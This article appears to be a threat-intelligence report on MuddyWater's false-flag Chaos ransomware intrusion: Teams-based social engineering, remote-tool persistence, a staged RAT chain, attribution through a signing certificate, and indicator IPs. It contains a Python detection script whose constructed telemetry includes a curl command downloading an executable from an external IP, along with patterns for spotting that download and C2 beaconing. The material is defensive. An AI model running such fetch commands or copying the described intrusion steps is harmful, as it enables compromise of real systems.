
The Iranian state-sponsored hacking group known as MuddyWater (also tracked as Mango Sandstorm, Seedworm, and Static Kitten) has been implicated in a “false flag” ransomware attack, according to a report from Rapid7. The incident, observed in early 2026, shows increasing sophistication and an attempt to blur attribution by adopting cybercrime tactics.
False Flag Attack and Sophisticated Tactics
The initial attack appeared consistent with a ransomware-as-a-service (RaaS) group operating under the Chaos brand. However, evidence suggests this is a state-backed targeted attack disguised as opportunistic extortion.
Rapid7 highlighted that the campaign was characterized by a “high-touch” social engineering phase through Microsoft Teams. The attackers used interactive screen sharing sessions to:
- Collect credentials.
- Manipulate multi-factor authentication (MFA).
Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and establishing long-term persistence using remote management tools like DWAgent.
MuddyWater and the Obscuration of Attribution
The findings indicate an effort by MuddyWater to “muddy” attribution by increasingly using tools available on the cybercrime black market. This shift has been documented by several security firms, which have noted the use of tools such as CastleRAT and Tsundere.
This is not the first time MuddyWater has carried out ransomware attacks. In September 2020, they were credited with a campaign against Israeli organizations using the PowGoop loader to deploy a destructive variant of Thanos ransomware. In 2023, Microsoft revealed that the group partnered with DEV-1084 (known as DarkBit) for destructive attacks under the guise of ransomware. More recently, in October 2025, they are believed to have used Qilin ransomware against an Israeli government hospital.
Check Point noted in March that these attackers are likely “Iran-affiliated operators working across the cybercriminal ecosystem, using a brand of criminal ransomware and methods associated with the extortion market, while serving an Iranian strategic objective.”
The Chaos RaaS Group
Chaos is a RaaS group that emerged in early 2025, known for its double extortion model and advertising its affiliate program on underground forums such as RAMP and RehubCom.
Chaos attacks use a combination of:
- Mail flooding and vishing: Through Teams, often impersonating IT support staff.
- Remote Access Tools Deployment: Such as Microsoft Quick Assist, to get an initial foothold.
Rapid7 also noted that Chaos has demonstrated triple extortion (threats of DDoS attacks) and even quadruple extortion (threats to contact customers or competitors).
Technical Details of the Intrusion
In the intrusion analyzed by Rapid7, MuddyWater/Chaos initiated external chat requests through Teams to interact with employees and gain initial access through screen sharing sessions. After the compromise, they used compromised user accounts to:
- Perform reconnaissance.
- Establish persistence with DWAgent and AnyDesk.
- Move laterally.
- Exfiltrate data.
Ransom negotiations were subsequently conducted via email. The attackers ran basic discovery commands, accessed VPN configuration files, and instructed users to enter their credentials into local text files. They also deployed AnyDesk for ease of access.
The attackers were also observed using RDP to download an executable (ms_upd.exe) from an external server (172.86.126[.]208) with the curl utility, which started a multiphase infection chain:
- ms_upd.exe (aka Stagecomp): Collects system information and communicates with a command and control (C2) server to download the next-stage payloads (game.exe, WebView2Loader.dll and visualwincomp.txt).
- game.exe (aka Darkcomp): A custom remote access trojan (RAT) that disguises itself as a legitimate Microsoft WebView2 application; it is a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll: A legitimate DLL downloaded by ms_upd.exe, required for embedding web content in Windows applications.
- visualwincomp.txt: An encrypted configuration used by the RAT to obtain information from the C2.
The RAT connects to the C2 server and polls new commands every 60 seconds, allowing the execution of PowerShell commands or scripts, file operations, and the creation of an interactive cmd.exe or PowerShell shell.
Links with MuddyWater
The attribution to MuddyWater is derived from the use of a code signing certificate associated with “Donald Gay” to sign ms_upd.exe. This certificate has previously been used by the group to sign their malware, including a CastleLoader downloader called Fakeset.
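The infection chain and the RAT's fixed 60-second polling described above, together with the signer-based attribution, translate directly into endpoint detection logic. The following is an added example written for this article (it is not Rapid7's code, nor the article's own). It runs over constructed telemetry records whose field names (`type`, `image`, `cmdline`, `parent`, `dst`, `signer`) are assumptions rather than any product's real schema; the download IP is the one reported above, while the C2 address 198.51.100.7 is a constructed placeholder, since the report as summarized here does not give it.

```python
"""Detection rules for the Stagecomp/Darkcomp chain: LOLBin download of an
executable from a bare IP, the dropped file spawning a child, regular
beaconing to one destination, and a watch-listed code-signing subject.
Added example; telemetry below is constructed, not real logs."""
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample telemetry. "t" is seconds from an arbitrary epoch.
# The "signer" field is an assumed enrichment (Authenticode subject name).
C2_PLACEHOLDER = "198.51.100.7"  # constructed; not an IoC from the report
SAMPLE_EVENTS = [
    {"t": 0, "type": "process", "host": "ws01", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\ms_upd.exe http://172.86.126.208/ms_upd.exe"},
    {"t": 5, "type": "process", "host": "ws01", "parent": "cmd.exe",
     "image": r"C:\Users\alice\ms_upd.exe", "cmdline": "ms_upd.exe", "signer": "Donald Gay"},
    {"t": 30, "type": "process", "host": "ws01", "parent": "ms_upd.exe",
     "image": r"C:\Users\alice\game.exe", "cmdline": "game.exe"},
    # The RAT polling its C2 every 60 seconds (eight connections).
    *({"t": 30 + 60 * i, "type": "network", "host": "ws01",
       "image": r"C:\Users\alice\game.exe", "dst": C2_PLACEHOLDER, "dport": 443}
      for i in range(8)),
    # Benign browser traffic with irregular gaps (constructed, documentation IP).
    *({"t": t, "type": "network", "host": "ws02", "image": "msedge.exe",
       "dst": "203.0.113.10", "dport": 443} for t in (12, 17, 140, 141, 700)),
]

SIGNER_WATCHLIST = {"donald gay"}  # subject reused across MuddyWater samples
URL_IP_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})", re.I)
EXEC_EXT_RE = re.compile(r"\.(exe|dll)\b", re.I)
CURL_OUT_RE = re.compile(r"-o\s+(\S+)")


def basename(path):
    """Lower-cased file name from a Windows path (or a bare name)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_curl_download(events):
    """Rule 1: curl.exe fetching an .exe/.dll directly from a bare IP."""
    hits = []
    for e in events:
        if e["type"] != "process" or basename(e["image"]) != "curl.exe":
            continue
        m = URL_IP_RE.search(e["cmdline"])
        if m and EXEC_EXT_RE.search(e["cmdline"]):
            hits.append((e["host"], m.group(1), e["t"]))
    return hits


def detect_dropper_chain(events, window=600):
    """Rule 2: a file written by curl later appears as the parent of a new
    process on the same host within `window` seconds (Stagecomp -> Darkcomp)."""
    downloads = {}  # (host, dropped file name) -> time of download
    for e in events:
        if e["type"] == "process" and basename(e["image"]) == "curl.exe":
            m = CURL_OUT_RE.search(e["cmdline"])
            if m:
                downloads[(e["host"], basename(m.group(1)))] = e["t"]
    chain = []
    for e in events:
        if e["type"] != "process":
            continue
        key = (e["host"], basename(e["parent"]))
        if key in downloads and 0 <= e["t"] - downloads[key] <= window:
            chain.append((e["host"], key[1], basename(e["image"])))
    return chain


def detect_beaconing(events, min_connections=6, max_jitter=0.1):
    """Rule 3: one process talking to one destination at near-constant
    intervals. Flags when the gaps' coefficient of variation <= max_jitter;
    returns (host, image, dst, mean interval in seconds)."""
    by_key = defaultdict(list)
    for e in events:
        if e["type"] == "network":
            by_key[(e["host"], basename(e["image"]), e["dst"])].append(e["t"])
    findings = []
    for key, times in by_key.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            findings.append((*key, round(avg)))
    return findings


def detect_watchlisted_signer(events):
    """Rule 4: process image signed with a watch-listed certificate subject."""
    return [(e["host"], basename(e["image"]), e["signer"])
            for e in events
            if e["type"] == "process" and e.get("signer", "").lower() in SIGNER_WATCHLIST]


if __name__ == "__main__":
    for name, fn in (("curl download", detect_curl_download),
                     ("dropper chain", detect_dropper_chain),
                     ("beaconing", detect_beaconing),
                     ("watchlisted signer", detect_watchlisted_signer)):
        print(f"{name}: {fn(SAMPLE_EVENTS)}")
```

The beaconing rule is the one that survives the absence of encryption noted in the article: even when no ransomware artifacts fire, a 60-second fixed-interval poll from a user-writable path stands out against browser traffic, whose gaps are irregular. Tune `min_connections` and `max_jitter` to the noise level of the environment before alerting on it.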
Other Iranian Nexus Attacks
This development coincides with other reports on Iranian operations:
- Hunt.io: Revealed an Iranian nexus operation targeting Omani government institutions, exfiltrating over 26,000 Ministry of Justice user records, court case data, and SAM and SYSTEM registry hives. An open directory was found at 172.86.76[.]127.
- Handala Hack: A pro-Iran hacktivist group that claims to have published details of nearly 400 US Navy service members in the Persian Gulf and to have attacked the Port of Fujairah in the United Arab Emirates, exfiltrating some 11,000 sensitive documents.
Sergey Shykevich of Check Point Research warned of the escalation of Iranian cyber operations and the explicit connection between the cyber and kinetic domains, suggesting that stolen port infrastructure data could be used for physical missile targeting.
Conclusions
The growing convergence between state-sponsored intrusion activity and cybercrime tactics, such as the use of RaaS frameworks, allows actors like MuddyWater to blur distinctions and complicate attribution. This diverts defense efforts toward the immediate impact, delaying the identification of underlying persistence mechanisms. The absence of file encryption, despite ransomware artifacts, suggests that the ransomware component primarily serves as a facilitation or obfuscation mechanism, rather than being the primary target of the intrusion.
Source: See more at Comfidentia
References
- Original source: See original article
- Rapid7
- The Hacker News
- Ctrl-Alt-Intel
- Broadcom
- Check Point
- JUMPSEC
- Hunt.io
- Microsoft Teams
- Microsoft Quick Assist
- DWAgent
- AnyDesk
- IP: 172.86.126[.]208
- IP: 172.86.76[.]127
- Code Signing Certificate: Donald Gay